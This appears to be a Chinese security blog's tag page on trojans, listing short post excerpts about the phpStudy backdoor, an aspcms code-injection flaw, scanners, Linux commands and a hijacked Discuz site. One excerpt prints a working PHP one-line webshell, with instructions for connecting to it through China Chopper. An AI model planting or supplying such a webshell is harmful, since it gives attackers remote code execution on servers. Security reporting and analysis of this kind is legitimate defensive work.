标签：木马

2019-09-29无依阅读(278)评论(0)赞(0)

PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击，程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。经过分析除了有反向连接木马之外，还可以正向执行任意php代码。 影响版本及路径 通过分析，后门代码存在于extphp...

2019-08-13无依阅读(981)评论(0)赞(3)

aspcms主要是信息发布系统，影响版本为asp。漏洞成因，在留言板处对信息处理不当，导致代码注入。可直接将一句话木马插入数据库。数据库默认配置为asp.目录在/data/data.asp下。利用方法，保证默认数据库路径末更改及可留言，就算...

2019-07-11无依阅读(785)评论(0)赞(0)

Scanners Box是一个集合github平台上的安全行业从业者自研开源扫描器的仓库，包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器，同时该仓库只收录各位网友自己编写的一般性开源...

2019-05-06无依阅读(800)赞(0)

crontab命令是Unix和Linux用于设置周期性被执行的指令，是互联网很常用的技术，很多任务都会设置在crontab循环执行 如果不使用crontab，那么任务就是常驻程序，这对你的程序要求比较高，一个要求你的程序是24X7小时不宕机...

2019-01-06无依阅读(856)评论(0)赞(5)

 2018年结束对过去一年的网络安全事件进行了概括总结，正文如下 01.电子邮件仍然是一种流行的攻击媒介 员工电子邮箱成为所有公司需要面临的最大威胁。电子邮件是最受欢迎的威胁媒介之一，它越来越多地被网络犯罪分子用作网络钓鱼、恶意软...

2017-05-27无依阅读(893)评论(0)赞(1)

第一种：1.php <?=($_=@$_GET[2]).@$_($_GET[1])?> 用中国菜刀连接： http://www.cn-caidao.com/1.php?2=assert 密码是1 第二种：2.php <? ...

2016-12-15无依阅读(818)评论(0)赞(0)

linux常用命令及参数用法（第一讲） linux常用命令及参数用法(不常用的参数未列,有兴趣的自行百度或者liux下命令后跟--help查看) reboot 重启 halt | shutdown 关机 cat 1.txt 由第一行开始显示...

2016-10-21无依阅读(1037)评论(0)赞(1)

今天，查看discuz程序百度收录的快照查看是正确的，但是访问快照的时候就跳转到了赌博网站。最后查看到/source/class/class_core.php文件被挂马  js版本代码： var refurl=document.r...